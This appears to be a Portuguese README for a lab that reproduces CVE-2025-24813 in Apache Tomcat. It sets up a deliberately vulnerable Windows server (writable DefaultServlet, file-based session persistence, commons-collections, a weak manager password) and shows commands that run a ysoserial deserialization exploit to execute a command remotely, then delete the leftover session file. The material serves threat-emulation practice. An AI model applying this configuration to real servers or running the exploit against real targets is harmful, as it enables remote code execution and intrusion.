
Instruções para implementação rápida do Tomcat v9.0.90 com java 25.0.1 2025-10-21 LTS no Windows Server 2019 Standard para pesquisadores preguiçosos.
Este repositório tem como objetivo fornecer instruções claras para a implantação rápida do Tomcat v9.0.90 com java 25.0.1 2025-10-21 LTS no Windows Server 2019 Standard para exercícios de emulação de ameaças de cibersegurança. O exploit.py utiliza o ysoserial-all.jar para criar um payload usando o módulo CommonsCollections6 no ysoserial-all.jar, que posteriormente é desserializado pela dependência commons-collections-3.2.1.jar em %CATALINA_HOME%\webapps\ROOT\WEB-INF\lib.
Tomcat v9.0.90:Invoke-WebRequest -Uri "https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90-windows-x64.zip" -OutFile "apache-tomcat-9.0.90-windows-x64.zip"
Expand-Archive -Path "apache-tomcat-9.0.90-windows-x64.zip" -DestinationPath "C:\"
java 25.0.1 2025-10-21 LTS (versão ZIP):Invoke-WebRequest -Uri "https://download.oracle.com/java/25/archive/jdk-25_windows-x64_bin.zip" -OutFile "jdk-25_windows-x64_bin.zip"
Expand-Archive -Path "jdk-25_windows-x64_bin.zip" -DestinationPath "C:\"
mkdir C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
cd C:\apache-tomcat-9.0.90\webapps\ROOT\WEB-INF\lib\
Invoke-WebRequest -Uri "https://repo1.maven.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar" -OutFile "commons-collections-3.2.1.jar"
1. Clique em Iniciar
2. Digite "editar as variáveis de ambiente do sistema"
3. Crie duas novas Variáveis de Sistema chamadas
- `%JAVA_HOME%` com valor `C:\jdk-25.0.1`
- `%CATALINA_HOME%` com valor `C:\apache-tomcat-9.0.90`
4. Edite a Variável de Sistema chamada `Path` e adicione os seguintes valores:
- `%JAVA_HOME%\bin`
- `%CATALINA_HOME%\bin`
C:\apache-tomcat-9.0.90\bin\service.bat install Tomcat9Server
Set-Service -Name "Tomcat9Server" -StartupType Automatic
Start-Service -Name "Tomcat9Server"
tomcat-users.xml na pasta tomcat-9.0.90\conf e adicione o seguinte ANTES de </tomcat-users>:<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
context.xml na pasta tomcat-9.0.90\conf e substitua TODO o conteúdo pelo seguinte:<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<!-- The contents of this file will be loaded for each web application -->
<Context>
<Manager className="org.apache.catalina.session.PersistentManager" maxIdleBackup="1" saveOnRestart="true" processExpiresFrequency="1">
<Store className="org.apache.catalina.session.FileStore"/>
</Manager>
</Context>
web.xml na pasta tomcat-9.0.90\conf, procure por DefaultServlet e substitua todo o <servlet></servlet> pelo seguinte:<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
shutdown.bat
startup.bat
New-NetFirewallRule -DisplayName "Tomcat9Server" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow
index.html com aparência legítima em C:\tomcat-9.0.90\webapps\ROOT para deixá-lo mais apresentável.<Connector port="443"
protocol="org.apache.coyote.http11.Http11NioProtocol"
maxThreads="150"
SSLEnabled="true"
scheme="https"
secure="true">
<SSLHostConfig>
<Certificate certificateKeystoreFile="C:\tomcat-9.0.90\conf\ssl\cert.pfx"
certificateKeystorePassword=""
certificateKeystoreType="PKCS12" />
</SSLHostConfig>
</Connector>
New-NetFirewallRule -DisplayName "Tomcat9HTTPSServer" -Direction Inbound -Protocol TCP -LocalPort 443 -Action Allow
exploit.pygit clone <this-repo-url>
cd CVE-2025-24813
pip install requests
java --version
curl -L -o ysoserial-all.jar https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
python exploit.py -t http://<target IP>:8080/ -c "cmd.exe /c calc.exe"
exploit.py, dois arquivos de sessão seriam criados em C:\tomcat-9.0.90\webapps\ROOT e C:\tomcat-9.0.90\work\Catalina\localhost\ROOT com um nome aleatório. O .session dentro da pasta work deve ser excluído alguns segundos após a execução.